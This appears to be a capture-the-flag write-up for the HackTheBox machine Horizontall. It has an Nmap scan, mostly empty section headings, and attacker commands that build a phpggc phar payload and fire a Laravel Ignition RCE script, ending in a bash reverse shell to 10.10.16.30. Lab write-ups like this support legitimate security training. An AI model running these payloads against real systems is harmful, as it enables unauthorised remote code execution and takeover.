HackTheBox — Horizontall

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-03 13:33 EET
Nmap scan report for 10.10.11.105
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP Enumeration

Initial Foothold / User

Reset The Admin Password

Code Execution

Getting Root

On the victim machine

On the attacker machine

php -d'phar.readonly=0' phpggc/phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
python3 laravel-ignition-rce.py http://localhost:1337/ /tmp/exploit.phar
php -d'phar.readonly=0' phpggc/phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system 'bash -c "bash -i >& /dev/tcp/10.10.16.30/9001 0>&1"'
python3 laravel-ignition-rce.py http://localhost:1337/ /tmp/exploit.phar
